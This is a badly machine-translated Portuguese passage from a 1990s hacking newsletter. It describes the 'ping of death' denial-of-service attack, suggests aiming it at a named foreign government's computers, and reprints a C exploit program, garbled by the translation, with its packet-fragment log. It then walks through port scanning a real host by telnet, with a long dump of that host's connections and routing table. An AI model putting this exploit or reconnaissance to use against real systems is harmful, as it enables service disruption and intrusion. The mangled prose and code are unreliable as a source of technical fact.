de Windows 95 para começ uma conexão do PPP ou do SLIP. ************************************ Em seguida, começ o seu conectado ao Internet. Mas não funcionar um navegador ou qualquer coisa. Em lugar de, uma vez que seu programa marcação telefónica dos trabalhos em rede lhe diz que você tem uma conexão, estalar sobre a tecla do “começo” e ir à lista “MS-DOS.” Abrir esta janela do DOS. Você começ um alerta: C:windows > Deixar-nos agora primeiramente fazer isto a boa maneira do cidadão. Neste alerta você pode dactilografar dentro um comando ordinário liso do “sibilo”: hostname de C:windowsping onde o “hostname” é o endereço de algum computador do Internet. Por exemplo, você poderia sibilar thales.nmia.com, que é um de meus computadores favoritos, nomeado após um filósofo grego obscuro. Agora se você aconteceu saber o endereço de um de computadores de Saddam Hussein, entretanto, você pôde querer dar o comando: c:windowsping - l 65510 saddam_hussein's.computer.mil
  • 19. Agora não fazer realmente isto a um computador real! Alguns, mas não todos, computadores deixarão de funcionar e para permanecer pendurados ou recarregar quando começ este sibilo. Outro continuarão a trabalhar cheerily longitudinalmente, e então vão de repente sob horas mais tarde. Por que? Esse extra adicionado - l 65510 cria uma datagrama gigante para o pacote do sibilo. Alguns computadores, quando pedidos para emitir para trás uma datagrama idêntica, começ sujados realmente acima. Se você quer todos os detalhes cruentos nesta façanha do sibilo, incluindo como proteger para fora seus computadores dela, verificação http://www.sophist.demon.co.uk/ping. Agora há outras maneiras de manufacturar uma datagrama gigante do sibilo além de usar Windows 95. Por exemplo, se você funciona determinadas versões de FreeBSD ou de linux de Unix em seu PC, você pode funcionar este programa, que foi afixado à lista de Bugtraq. De: Bill Fenner <fenner@freefall.freebsd.org> : Receptores múltiplos da lista BUGTRAQ <BUGTRAQ@netspace.org> Assunto: Programa da façanha do sibilo Desde que alguns povos não têm necessariamente Windows '95 caixas se encontrar ao redor, I (Fenner) escreveu o seguinte programa da façanha. Exige uma camada crua do soquete que não suje com o pacote, assim que o DEB 4.3, SunOS e os solaris são para fora. Trabalha muito bem nos sistemas 4.4BSD. Deve trabalhar no linux se você compila com - DREALLY_RAW. Sentir livre fazer com este o que você quer. Usar por favor esta ferramenta para testar somente suas próprias máquinas, e para não deixar de funcionar outro. * win95ping.c * * Simular o mal win95 “sibilo - l 65510 buggyhost”. * versão 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996 * * Isto exige os soquetes crus que não sujam com o pacote de todo (outro * do que adicionando a soma de controle). Isso significa esse SunOS, solaris, e * Os sistemas de BSD4.3-based estão para fora. Sistemas BSD4.4 (FreeBSD, NetBSD, * OpenBSD, BSDI) trabalhará. O linux pôde trabalhar, mim não tem um linux * sistema para tentá-lo sobre. * * O ataque da caixa Win95 olha o gosto: * 17:26:11.013622 cslwin95 > arkroyal: ICMP: pedido do eco (6144:1480 @0+ do frag) * 17:26:11.015079 cslwin95 > arkroyal: (6144:1480 @1480+ do frag) * 17:26:11.016637 cslwin95 > arkroyal: (6144:1480 @2960+ do frag) * 17:26:11.017577 cslwin95 > arkroyal: (6144:1480 @4440+ do frag) * 17:26:11.018833 cslwin95 > arkroyal: (6144:1480 @5920+ do frag) * 17:26:11.020112 cslwin95 > arkroyal: (6144:1480 @7400+ do frag)
  • 20. * 17:26:11.021346 cslwin95 > arkroyal: (6144:1480 @8880+ do frag * 17:26:11.022641 cslwin95 > arkroyal: (6144:1480 @10360+ do frag) * 17:26:11.023869 cslwin95 > arkroyal: (6144:1480 @11840+ do frag) * 17:26:11.025140 cslwin95 > arkroyal: (6144:1480 @13320+ do frag) * 17:26:11.026604 cslwin95 > arkroyal: (6144:1480 @14800+ do frag) * 17:26:11.027628 cslwin95 > arkroyal: (6144:1480 @16280+ do frag) * 17:26:11.028871 cslwin95 > arkroyal: (6144:1480 @17760+ do frag) * 17:26:11.030100 cslwin95 > arkroyal: (6144:1480 @19240+ do frag) * 17:26:11.031307 cslwin95 > arkroyal: (6144:1480 @20720+ do frag) * 17:26:11.032542 cslwin95 > arkroyal: (6144:1480 @22200+ do frag) * 17:26:11.033774 cslwin95 > arkroyal: (6144:1480 @23680+ do frag) * 17:26:11.035018 cslwin95 > arkroyal: (6144:1480 @25160+ do frag) * 17:26:11.036576 cslwin95 > arkroyal: (6144:1480 @26640+ do frag) * 17:26:11.037464 cslwin95 > arkroyal: (6144:1480 @28120+ do frag) * 17:26:11.038696 cslwin95 > arkroyal: (6144:1480 @29600+ do frag) * 17:26:11.039966 cslwin95 > arkroyal: (6144:1480 @31080+ do frag) * 17:26:11.041218 cslwin95 > arkroyal: (6144:1480 @32560+ do frag) * 17:26:11.042579 cslwin95 > arkroyal: (6144:1480 @34040+ do frag) * 17:26:11.043807 cslwin95 > arkroyal: (6144:1480 @35520+ do frag) * 17:26:11.046276 cslwin95 > arkroyal: (6144:1480 @37000+ do frag) * 17:26:11.047236 cslwin95 > arkroyal: (6144:1480 @38480+ do frag) * 17:26:11.048478 cslwin95 > arkroyal: (6144:1480 @39960+ do frag) * 17:26:11.049698 cslwin95 > arkroyal: (6144:1480 @41440+ do frag) * 17:26:11.050929 cslwin95 > arkroyal: (6144:1480 @42920+ do frag) * 17:26:11.052164 cslwin95 > arkroyal: (6144:1480 @44400+ do frag) * 17:26:11.053398 cslwin95 > arkroyal: (6144:1480 @45880+ do frag) * 17:26:11.054685 cslwin95 > arkroyal: (6144:1480 @47360+ do frag) * 17:26:11.056347 cslwin95 > arkroyal: (6144:1480 @48840+ do frag) * 17:26:11.057313 cslwin95 > arkroyal: (6144:1480 @50320+ do frag) * 17:26:11.058357 cslwin95 > arkroyal: (6144:1480 @51800+ do frag) * 17:26:11.059588 cslwin95 > arkroyal: (6144:1480 @53280+ do frag) * 17:26:11.060787 cslwin95 > arkroyal: (6144:1480 @54760+ do frag) * 17:26:11.062023 cslwin95 > arkroyal: (6144:1480 @56240+ do frag) * 17:26:11.063247 cslwin95 > arkroyal: (6144:1480 @57720+ do frag) * 17:26:11.064479 cslwin95 > arkroyal: (6144:1480 @59200+ do frag) * 17:26:11.066252 cslwin95 > arkroyal: (6144:1480 @60680+ do frag) * 17:26:11.066957 cslwin95 > arkroyal: (6144:1480 @62160+ do frag) * 17:26:11.068220 cslwin95 > arkroyal: (6144:1480 @63640+ do frag) * 17:26:11.069107 cslwin95 > arkroyal: (6144:398 @65120 do frag) * * #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h>
  • 21. #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> /* * Se sua semente não muck com pacotes crus, o #define REALLY_RAW. * Este é provavelmente somente linux. * #ifdef REALLY_RAW REPARO do #define (x) htons (x) #else REPARO do #define (x) (x) #endif int cano principal (argc do int, carvão animal ** argv) { int s; buf do carvão animal [1500]; *ip do IP do struct = (IP do struct *) buf; *icmp do ICMP do struct = (ICMP do struct *) (IP + 1); *hp hostent do struct; dst do sockaddr_in do struct; offset do int; int = em 1; bzero (buf, buf do sizeof); se ((s = soquete (AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) { perror (“soquete”); saída (1); } se (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (sobre)) < 0) { perror (“IP_HDRINCL”); saída (1); } se (argc!= 2) { fprintf (stderr, “uso: hostname de %s n”, argv [0]); saída (1); } se ((cavalos-força = gethostbyname (argv [1])) ZERO do ==) { se ((ip->ip_dst.s_addr = inet_addr (argv [1])) == -1) { fprintf (stderr, “%s: anfitrião desconhecido n”, argv [1]); } } mais { bcopy (hp->h_addr_list [0], &ip->ip_dst.s_addr, hp->h_length); } printf (“emitindo a %s n”, inet_ntoa (ip->ip_dst));
  • 22. ip->ip_v = 4; *ip do ip->ip_hl = do sizeof >> 2; ip->ip_tos = 0; ip->ip_len = REPARO (buf do sizeof); ip->ip_id = htons (4321); ip->ip_off = REPARO (0); ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; a semente de/* preenche * ip->ip_src.s_addr = 0; a semente de/* preenche * dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->icmp_type = ICMP_ECHO; icmp->icmp_code = 0; icmp->icmp_cksum = htons (~ (ICMP_ECHO << 8)); /* a soma de controle de todos os 0 é fácil de computar * para (deslocar = 0; offset < 65536; += offset (buf do sizeof - *ip do sizeof)) { ip->ip_off = REPARO (deslocar >> 3); se (deslocar < 65120) ip->ip_off |= REPARO (IP_MF); mais ip->ip_len = o REPARO (418); /* fazem o total 65538 * se (sendto (s, buf, buf do sizeof, 0, (sockaddr do struct *) &dst, dst) do sizeof < 0) { fprintf (o stderr, “deslocou %d: ”, offset); perror (“sendto”); } se (deslocar o == 0) { icmp->icmp_type = 0; icmp->icmp_code = 0; icmp->icmp_cksum = 0; } } } (Extremidade da mensagem da façanha do sibilo de Fenner.) ******************************************** VOCÊ PODE IR ENCARCERAR A NOTA: Não é não somente este corte elite, se você está lendo este que você não sabe bastante para se manter da obtenção rebentado de fazer este corte do sibilo. De um lado, se você devia o fazer a um anfitrião do Internet em Iraque… ******************************************** Naturalmente há muitas outras coisas que do kewl você pode fazer com sibilo. Se você tem um cliente de escudo, você pode encontrar lotes do stuph sobre o sibilo dando o comando: sibilo do homem
  • 23. De facto, você pode começ lotes dos detalhes em todo o comando de Unix com o “homem.” Ter o divertimento com sibilo -- e ser bom! Mas recordar, mim não estão implorando os presunçosos maus do gênio ser bons. Ver se eu me importo quando você começ rebentado… _______________________________________________________ Para subscrever, o email hacker@techbroker.com com mensagem “subscreve o hh.” Para emitir-me o email confidencial (por favor, nenhuns exames das actividades ilegais) usar cmeinel@techbroker.com. Dirigir por favor flamas a colaborador/null@techbroker.com. Corte feliz! Direitos reservados Carolyn 1996 P. Meinel. Você pode enviar o GUIA (na maior parte) AO CORTE INOFENSIVO contanto que você deixar esta observação na extremidade. ______________________________________________________ __________________________________________________________ GUIA (na maior parte) AO CORTE INOFENSIVO Vol. 2 número 4 Mais introdução ao TCP/IP: surfar portuário! Demónios! Como começ em quase algum computador sem entrar e sem quebrar a lei. Imprimir seus amigos à nora e descobrir realmente o kewl, stuph legal, seguro. __________________________________________________________ Alguns dias há eu tive uma visita do amigo de senhora. É 42 e não possui um computador. Entretanto, está tomando uma classe em computadores pessoais em um Instituto de Ensino Superior. Quis saber o que todo este stuph de corte é sobre. Assim eu decidi introduzi-la para mover surfar. E quando fazendo o, nós tropeçamos através de algo kewl. Surfar portuário aproveita-se da estrutura do TCP/IP. Este é o protocolo (jogo de réguas) usado para que os computadores falem sobre o Internet. Um dos princípios básicos de Unix (o sistema de exploração o mais popular no Internet) é atribuir um “porto” a cada função que um computador pôde comandar outro para executar. Os exemplos comuns são emitir e para receber o email, ler newsgroup de USENET, telnet, limas de transferência, e Web pages da oferta. ************************ Nota #1 do Newbie: Um porto do computador é um lugar em onde a informação vá ou fora dela. Em seu computador home, os exemplos dos portos são seu monitor, que emitem a informação para fora, seu teclado e o rato, que emitem a informação dentro, e seu modem, que emite a informação para fora e dentro. Mas um computador de anfitrião do Internet tal como callisto.unm.edu tem muito mais portos do que um computador home típico. Estes portos são identificados por números. Agora estes não são todos os portos físicos, como um teclado ou um porto RS232 de série (para seu modem). São portos virtuais (do software). Um “serviço” é um programa que funciona em um “porto.” Quando você telnet a um porto, esse programa for em serviço, apenas esperando sua entrada. Corte feliz! ************************ Assim se você quer ler um Web page, seu navegador contacta o número portuário 80 e diz o computador que controla esse Web site o deixar dentro. E, sure bastante, você começ nesse computador do web server sem uma senha.
  • 24. APROVAÇÃO, grande coisa. Isso é consideravelmente padrão para o Internet. Muitos -- a maioria -- os computadores no Internet deixá-lo-ão fazem algumas coisas com elas sem precisar uma senha, Entretanto, a essência do corte está fazendo as coisas que não são óbvias. Isso apenas não salta em você dos manuais. O one-way que você pode mover uma intensificação do funcionamento do usuário do computador do moinho é aprender como mover a ressaca. A essência do porto que surfa é seleccionar um computador de alvo e explorá-lo para considerar que portos estão abertos e o que você pode fazer com eles. Agora se você é um cabouqueiro preguiçoso você pode usar ferramentas enlatadas do cabouqueiro tais como Satan ou Netcat. Estes são programas que você pode funcionar do linux, FreeBSD ou solaris (todos os tipos de Unix) de seu PC. Fazem a varredura automaticamente de seus computadores de alvo. Dir-lhe-ão que portos estão no uso. Igualmente sondarão estes portos para a presença de demónios com sabem falhas de segurança, e dizem-lhe o que são. ******************************** Nota do Newbie # 2: Um demónio não é alguma sorte do grinch ou o gremlin ou o indivíduo 666. É um programa que funcione no fundo em muitos (mas não todo o) portos do sistema de Unix. Espera-o para vir longitudinalmente e usá-lo. Se você encontra um demónio em um porto, é provavelmente hackable. Algumas ferramentas do cabouqueiro dir-lhe-ão o que as características hackable são dos demónios que detectam. ******************************** Entretanto, há diversas razões surfar à mão portos em vez de automaticamente. Você aprenderá algo. Sondando manualmente o começ uma sensação do intestino para como o demónio que funciona nesse porto se comporta. É a diferença entre a observação de um filme x-rated e (corar). Você pode imprimir seus amigos. Se você funciona uma ferramenta enlatada do cabouqueiro como Satan seus amigos o olhará e o dirá, “grande coisa. Eu posso funcionar programas, demasiado.” Travarão imediatamente sobre ao segredo pequeno sujo do mundo do cabouqueiro. A maioria de façanhas de corte são apenas programas que running do lamerz pegararam de algum BBS ou ftp site. Mas se você incorpora a introdução por teclado dos comandos pela introdução por teclado vê-lo- ão usar seu cérebro. E você pode ajudá-los a jogar com demónios, também, e dá- lhes uma arremetida gigante. Verdadeiramente os cabouqueiros da elite surfam portos e jogo com demónios à mão porque é a única maneira de descobrir algo novo. Há somente alguns cem cabouqueiros -- no máximo -- quem descobrem o stuph novo. O funcionamento do descanso apenas enlatou façanhas repetidamente e sobre outra vez. Furar. Mas eu sou ensinando lhe como alcangar o pináculo do hackerdom. Deixar-me agora dizem-lhe o que meus amigo e eu envelhecidos médios descobrimos apenas a sujeira ao redor. Primeiramente, nós decidimos que nós não quisemos desperdiçar nosso tempo que suja com algum computador de anfitrião pequeno menor. Hey, deixar-nos vão por o máximo! Assim como você encontra um computador grande do kahuna no Internet? Nós começamos com um domínio que consistisse em um LAN dos PCes que funcionam
  • 25. o linux que eu aconteci saber já aproximadamente, de que fosse usado pelo ISP do acesso de Internet de New mexico: nmia.com. ***************************** Nota do Newbie # 3: Um domínio é um internet address. Você pode usá-lo para olhar acima quem funciona os computadores usados pelo domínio, e para olhar igualmente acima como esse domínio é conectado ao descanso do Internet. ***************************** Para fazer assim isto que nós registramos primeiramente em meu cliente de escudo com Cyberport Southwest. Eu dei o comando: >whois nmia.com do <slug> [66] - Acesso de Internet de New mexico (NMIA-DOM) SE de 2201 Buena Vista Albuquerque, nanômetro 87106 Domain Name: NMIA.COM Contacto administrativo, contacto técnico, contacto da zona: Orrell, Stan (SO11) SAO@NMIA.COM (505) 877-0617 Último actualizado Record em 11-Mar-94. Gravar criado em 11-Mar-94. Usuários de domínio em ordem listada: NS.NMIA.COM 198.59.166.10 GRANDE.NM.ORG 129.121.1.2 Agora é uma boa aposta que grande.nm.org está serindo muitos outros anfitriões do Internet ao lado de nmia.com. É aqui como nós movemos a ressaca nossa maneira de encontrar isto: >telnet grande.nm.org 15 do <slug> [67] - 129.121.1.2 de tentativa… Conectado a grande.nm.org. O carácter de escape é “^]”. Rev B do TGV MultiNet V3.5, VAX 4000-400, OpenVMS VAX V6.1 Data de validade da autorização da licença do produto ---------- ------- ------------- --------------- MULTINET sim A-137-1641 (nenhuns) NFS-CLIENT sim A-137-113237 (nenhuns) Configuração do *** para a lima “MULTINET:*** de NETWORK_DEVICES.CONFIGURATION” Bandeiras do endereço do CSR do adaptador de dispositivo/vector ------ ------- ----------- ------------ se0 (VMS compartilhado Ethernet/FDDI) - NENHUNS - NENHUNS - NENHUNS Conexões activas de MultiNet, including usuários: Estado (portuário) extrangeiro (portuário) local Proto do endereço do endereço de Receptor-q Snd-Q ----- ----- ----- ------------------ ------------------ ----- TCP 0 822 GRANDE.NM.ORG (NETSTAT) 198.59.115.24 (1569) ESTABELECIDO TCP 0 0 GRANDE.NM.ORG (POP3) 164.64.201.67 (1256) ESTABELECIDO
  • 26. TCP 0 0 GRANDE.NM.ORG (4918) 129.121.254.5 (TELNET) ESTABELECIDOS TCP 0 0 GRANDE.NM.ORG (TELNET) AVATAR.NM.ORG (3141) ESTABELECIDOS OS TCP 0 0 * (NAMESERVICE) * (*) ESCUTAM OS TCP 0 0 * (TELNET) * (*) ESCUTAM OS TCP 0 0 * (FTP) * (*) ESCUTAM OS TCP 0 0 * (DEDO) * (*) ESCUTAM OS TCP 0 0 * (NETSTAT) * (*) ESCUTAM OS TCP 0 0 * (SMTP) * (*) ESCUTAM OS TCP 0 0 * (INÍCIO DE UMA SESSÃO) * (*) ESCUTAM OS TCP 0 0 * (SHELL) * (*) ESCUTAM OS TCP 0 0 * (EXEC) * (*) ESCUTAM OS TCP 0 0 * (RPC) * (*) ESCUTAM OS TCP 0 0 * (NETCONTROL) * (*) ESCUTAM OS TCP 0 0 * (SYSTAT) * (*) ESCUTAM OS TCP 0 0 * (CHARGEN) * (*) ESCUTAM OS TCP 0 0 * (DIA) * (*) ESCUTAM OS TCP 0 0 * (TEMPO) * (*) ESCUTAM OS TCP 0 0 * (ECO) * (*) ESCUTAM OS TCP 0 0 * (DESCARTE) * (*) ESCUTAM OS TCP 0 0 * (IMPRESSORA) * (*) ESCUTAM OS TCP 0 0 * (POP2) * (*) ESCUTAM OS TCP 0 0 * (POP3) * (*) ESCUTAM OS TCP 0 0 * (KERBEROS_MASTER) * (*) ESCUTAM OS TCP 0 0 * (KLOGIN) * (*) ESCUTAM OS TCP 0 0 * (KSHELL) * (*) ESCUTAM TCP 0 0 GRANDE.NM.ORG (4174) OSO.NM.ORG (X11) ESTABELECIDOS TCP 0 0 GRANDE.NM.ORG (4172) OSO.NM.ORG (X11) ESTABELECIDOS TCP 0 0 GRANDE.NM.ORG (4171) OSO.NM.ORG (X11) ESTABELECIDOS OS TCP 0 0 * (FS) * (*) ESCUTAM UDP 0 0 * (NAMESERVICE) * (*) UDP 0 0 127.0.0.1 (NAMESERVICE) * (*) UDP 0 0 GRANDE.NM.OR (NAMESERV) * (*) UDP 0 0 * (TFTP) * (*) UDP 0 0 * (BOOTPS) * (*) UDP 0 0 * (KERBEROS) * (*) UDP 0 0 127.0.0.1 (KERBEROS) * (*) UDP 0 0 GRANDE.NM.OR (KERBEROS) * (*) UDP 0 0 * (*) * (*) UDP 0 0 * (SNMP) * (*) UDP 0 0 * (RPC) * (*) UDP 0 0 * (DIA) * (*) UDP 0 0 * (ECO) * (*) UDP 0 0 * (DESCARTE) * (*) UDP 0 0 * (TEMPO) * (*) UDP 0 0 * (CHARGEN) * (*)
  • 27. UDP 0 0 * (CONVERSA) * (*) UDP 0 0 * (NTALK) * (*) UDP 0 0 * (1023) * (*) UDP 0 0 * (XDMCP) * (*) MultiNet registou programas do RPC: Porto do protocolo da versão do programa ------- ------- -------- ---- PORTMAP 2 TCP 111 UDP 111 DE PORTMAP 2 Tabelas de roteamento do IP de MultiNet: MTU da relação do uso de Refcnt das bandeiras da passagem do destino ---------- ---------- ----- ------ ----- --------- ---- 198.59.167.1 LAWRII.NM.ORG acima, passagem, H 0 2 se0 1500 166.45.0.1 ENSS365.NM.ORG acima, passagem, H 0 4162 se0 1500 205.138.138.1 ENSS365.NM.ORG acima, passagem, H 0 71 se0 1500 204.127.160.1 ENSS365.NM.ORG acima, passagem, H 0 298 se0 1500 127.0.0.1 127.0.0.1 acima, hospeda 5 1183513 lo0 4136 198.59.167.2 LAWRII.NM.ORG acima, passagem, H 0 640 se0 1500 192.132.89.2 ENSS365.NM.ORG acima, passagem, H 0 729 se0 1500 207.77.56.2 ENSS365.NM.ORG acima, passagem, H 0 5 se0 1500 204.97.213.2 ENSS365.NM.ORG acima, passagem, H 0 2641 se0 1500 194.90.74.66 ENSS365.NM.ORG acima, passagem, H 0 1 se0 1500 204.252.102.2 ENSS365.NM.ORG acima, passagem, H 0 109 se0 1500 205.160.243.2 ENSS365.NM.ORG acima, passagem, H 0 78 se0 1500 202.213.4.2 ENSS365.NM.ORG acima, passagem, H 0 4 se0 1500 202.216.224.66 ENSS365.NM.ORG acima, passagem, H 0 113 se0 1500 192.132.89.3 ENSS365.NM.ORG acima, passagem, H 0 1100 se0 1500 198.203.196.67 ENSS365.NM.ORG acima, passagem, H 0 385 se0 1500 160.205.13.3 ENSS365.NM.ORG acima, passagem, H 0 78 se0 1500 202.247.107.131 ENSS365.NM.ORG acima, passagem, H 0 19 se0 1500 198.59.167.4 LAWRII.NM.ORG acima, passagem, H 0 82 se0 1500 128.148.157.6 ENSS365.NM.ORG acima, passagem, H 0 198 se0 1500 160.45.10.6 ENSS365.NM.ORG acima, passagem, H 0 3 se0 1500 128.121.50.7 ENSS365.NM.ORG acima, passagem, H 0 3052 se0 1500 206.170.113.8 ENSS365.NM.ORG acima, passagem, H 0 1451 se0 1500 128.148.128.9 ENSS365.NM.ORG acima, passagem, H 0 1122 se0 1500 203.7.132.9 ENSS365.NM.ORG acima, passagem, H 0 14 se0 1500 204.216.57.10 ENSS365.NM.ORG acima, passagem, H 0 180 se0 1500 130.74.1.75 ENSS365.NM.ORG acima, passagem, H 0 10117 se0 1500 206.68.65.15 ENSS365.NM.ORG acima, passagem, H 0 249 se0 1500 129.219.13.81 ENSS365.NM.ORG acima, passagem, H 0 547 se0 1500 204.255.246.18 ENSS365.NM.ORG acima, passagem, H 0 1125 se0 1500 160.45.24.21 ENSS365.NM.ORG acima, passagem, H 0 97 se0 1500 206.28.168.21 ENSS365.NM.ORG acima, passagem, H 0 2093 se0 1500 163.179.3.222 ENSS365.NM.ORG acima, passagem, H 0 315 se0 1500 198.109.130.33 ENSS365.NM.ORG acima, passagem, H 0 1825 se0 1500 199.224.108.33 ENSS365.NM.ORG acima, passagem, H 0 11362 se0 1500
  • 28. 203.7.132.98 ENSS365.NM.ORG acima, passagem, H 0 73 se0 1500 198.111.253.35 ENSS365.NM.ORG acima, passagem, H 0 1134 se0 1500 206.149.24.100 ENSS365.NM.ORG acima, passagem, H 0 3397 se0 1500 165.212.105.106 ENSS365.NM.ORG acima, passagem, H 0 17 se0 1006 205.238.3.241 ENSS365.NM.ORG acima, passagem, H 0 69 se0 1500 198.49.44.242 ENSS365.NM.ORG acima, passagem, H 0 25 se0 1500 194.22.188.242 ENSS365.NM.ORG acima, passagem, H 0 20 se0 1500 164.64.0 LAWRII.NM.ORG acima, passagem 1 40377 se0 1500 0.0.0 ENSS365.NM.ORG acima, passagem 2 4728741 se0 1500 207.66.1 GLORY.NM.ORG acima, passagem 0 51 se0 1500 205.166.1 GLORY.NM.ORG acima, passagem 0 1978 se0 1500 204.134.1 LAWRII.NM.ORG acima, passagem 0 54 se0 1500 204.134.2 GLORY.NM.ORG acima, passagem 0 138 se0 1500 192.132.2 129.121.248.1 acima, passagem 0 6345 se0 1500 204.134.67 GLORY.NM.ORG acima, passagem 0 2022 se0 1500 206.206.67 GLORY.NM.ORG acima, passagem 0 7778 se0 1500 206.206.68 LAWRII.NM.ORG acima, passagem 0 3185 se0 1500 207.66.5 GLORY.NM.ORG acima, passagem 0 626 se0 1500 204.134.69 GLORY.NM.ORG acima, passagem 0 7990 se0 1500 207.66.6 GLORY.NM.ORG acima, passagem 0 53 se0 1500 204.134.70 LAWRII.NM.ORG acima, passagem 0 18011 se0 1500 192.188.135 GLORY.NM.ORG acima, passagem 0 5 se0 1500 206.206.71 LAWRII.NM.ORG acima, passagem 0 2 se0 1500 204.134.7 GLORY.NM.ORG acima, passagem 0 38 se0 1500 199.89.135 GLORY.NM.ORG acima, passagem 0 99 se0 1500 198.59.136 LAWRII.NM.ORG acima, passagem 0 1293 se0 1500 204.134.9 GLORY.NM.ORG acima, passagem 0 21 se0 1500 204.134.73 GLORY.NM.ORG acima, passagem 0 59794 se0 1500 129.138.0 GLORY.NM.ORG acima, passagem 0 5262 se0 1500 192.92.10 LAWRII.NM.ORG acima, passagem 0 163 se0 1500 206.206.75 LAWRII.NM.ORG acima, passagem 0 604 se0 1500 207.66.13 GLORY.NM.ORG acima, passagem 0 1184 se0 1500 204.134.77 LAWRII.NM.ORG acima, passagem 0 3649 se0 1500 207.66.14 GLORY.NM.ORG acima, passagem 0 334 se0 1500 204.134.78 GLORY.NM.ORG acima, passagem 0 239 se0 1500 204.52.207 GLORY.NM.ORG acima, passagem 0 293 se0 1500 204.134.79 GLORY.NM.ORG acima, passagem 0 1294 se0 1500 192.160.144 LAWRII.NM.ORG acima, passagem 0 117 se0 1500 206.206.80 PENNY.NM.ORG acima, passagem 0 4663 se0 1500 204.134.80 GLORY.NM.ORG acima, passagem 0 91 se0 1500 198.99.209 LAWRII.NM.ORG acima, passagem 0 1136 se0 1500 207.66.17 GLORY.NM.ORG acima, passagem 0 24173 se0 1500 204.134.82 GLORY.NM.ORG acima, passagem 0 29766 se0 1500 192.41.211 GLORY.NM.ORG acima, passagem 0 155 se0 1500 192.189.147 LAWRII.NM.ORG acima, passagem 0 3133 se0 1500 204.134.84 PENNY.NM.ORG acima, passagem 0 189 se0 1500 204.134.87 LAWRII.NM.ORG acima, passagem 0 94 se0 1500
  • 29. 146.88.0 GLORY.NM.ORG acima, passagem 0 140 se0 1500 192.84.24 GLORY.NM.ORG acima, passagem 0 3530 se0 1500 204.134.88 LAWRII.NM.ORG acima, passagem 0 136 se0 1500 198.49.217 GLORY.NM.ORG acima, passagem 0 303 se0 1500 192.132.89 GLORY.NM.ORG acima, passagem 0 3513 se0 1500 198.176.219 GLORY.NM.ORG acima, passagem 0 1278 se0 1500 206.206.92 LAWRII.NM.ORG acima, passagem 0 1228 se0 1500 192.234.220 129.121.1.91 acima, passagem 0 2337 se0 1500 204.134.92 LAWRII.NM.ORG acima, passagem 0 13995 se0 1500 198.59.157 LAWRII.NM.ORG acima, passagem 0 508 se0 1500 206.206.93 GLORY.NM.ORG acima, passagem 0 635 se0 1500 204.134.93 GLORY.NM.ORG acima, passagem 0 907 se0 1500 198.59.158 LAWRII.NM.ORG acima, passagem 0 14214 se0 1500 198.59.159 LAWRII.NM.ORG acima, passagem 0 1806 se0 1500 204.134.95 PENNY.NM.ORG acima, passagem 0 3644 se0 1500 206.206.96 GLORY.NM.ORG acima, passagem 0 990 se0 1500 206.206.161 LAWRII.NM.ORG acima, passagem 0 528 se0 1500 198.59.97 PENNY.NM.ORG acima, passagem 0 55 se0 1500 198.59.161 LAWRII.NM.ORG acima, passagem 0 497 se0 1500 192.207.226 GLORY.NM.ORG acima, passagem 0 93217 se0 1500 198.59.99 PENNY.NM.ORG acima, passagem 0 2 se0 1500 198.59.163 GLORY.NM.ORG acima, passagem 0 3379 se0 1500 192.133.100 LAWRII.NM.ORG acima, passagem 0 3649 se0 1500 204.134.100 GLORY.NM.ORG acima, passagem 0 8 se0 1500 128.165.0 PENNY.NM.ORG acima, passagem 0 15851 se0 1500 198.59.165 GLORY.NM.ORG acima, passagem 0 274 se0 1500 206.206.165 LAWRII.NM.ORG acima, passagem 0 167 se0 1500 206.206.102 GLORY.NM.ORG acima, passagem 0 5316 se0 1500 160.230.0 LAWRII.NM.ORG acima, passagem 0 19408 se0 1500 206.206.166 LAWRII.NM.ORG acima, passagem 0 1756 se0 1500 205.166.231 GLORY.NM.ORG acima, passagem 0 324 se0 1500 198.59.167 GLORY.NM.ORG acima, passagem 0 1568 se0 1500 206.206.103 GLORY.NM.ORG acima, passagem 0 3629 se0 1500 198.59.168 GLORY.NM.ORG acima, passagem 0 9063 se0 1500 206.206.104 GLORY.NM.ORG acima, passagem 0 7333 se0 1500 206.206.168 GLORY.NM.ORG acima, passagem 0 234 se0 1500 204.134.105 LAWRII.NM.ORG acima, passagem 0 4826 se0 1500 206.206.105 LAWRII.NM.ORG acima, passagem 0 422 se0 1500 204.134.41 LAWRII.NM.ORG acima, passagem 0 41782 se0 1500 206.206.169 GLORY.NM.ORG acima, passagem 0 5101 se0 1500 204.134.42 GLORY.NM.ORG acima, passagem 0 10761 se0 1500 206.206.170 GLORY.NM.ORG acima, passagem 0 916 se0 1500 198.49.44 GLORY.NM.ORG acima, passagem 0 3 se0 1500 198.59.108 GLORY.NM.ORG acima, passagem 0 2129 se0 1500 204.29.236 GLORY.NM.ORG acima, passagem 0 125 se0 1500 206.206.172 GLORY.NM.ORG acima, passagem 0 5839 se0 1500 204.134.108 GLORY.NM.ORG acima, passagem 0 3216 se0 1500
  • 30. 206.206.173 GLORY.NM.ORG acima, passagem 0 374 se0 1500 198.175.173 LAWRII.NM.ORG acima, passagem 0 6227 se0 1500 198.59.110 GLORY.NM.ORG acima, passagem 0 1797 se0 1500 198.51.238 GLORY.NM.ORG acima, passagem 0 1356 se0 1500 192.136.110 GLORY.NM.ORG acima, passagem 0 583 se0 1500 204.134.48 GLORY.NM.ORG acima, passagem 0 42 se0 1500 198.175.176 LAWRII.NM.ORG acima, passagem 0 32 se0 1500 206.206.114 LAWRII.NM.ORG acima, passagem 0 44 se0 1500 206.206.179 LAWRII.NM.ORG acima, passagem 0 14 se0 1500 198.59.179 PENNY.NM.ORG acima, passagem 0 222 se0 1500 198.59.115 GLORY.NM.ORG acima, passagem 1 132886 se0 1500 206.206.181 GLORY.NM.ORG acima, passagem 0 1354 se0 1500 206.206.182 SIENNA.NM.ORG acima, passagem 0 16 se0 1500 206.206.118 GLORY.NM.ORG acima, passagem 0 3423 se0 1500 206.206.119 GLORY.NM.ORG acima, passagem 0 282 se0 1500 206.206.183 SIENNA.NM.ORG acima, passagem 0 2473 se0 1500 143.120.0 LAWRII.NM.ORG acima, passagem 0 123533 se0 1500 206.206.184 GLORY.NM.ORG acima, passagem 0 1114 se0 1500 205.167.120 GLORY.NM.ORG acima, passagem 0 4202 se0 1500 206.206.121 GLORY.NM.ORG acima, passagem 1 71 se0 1500 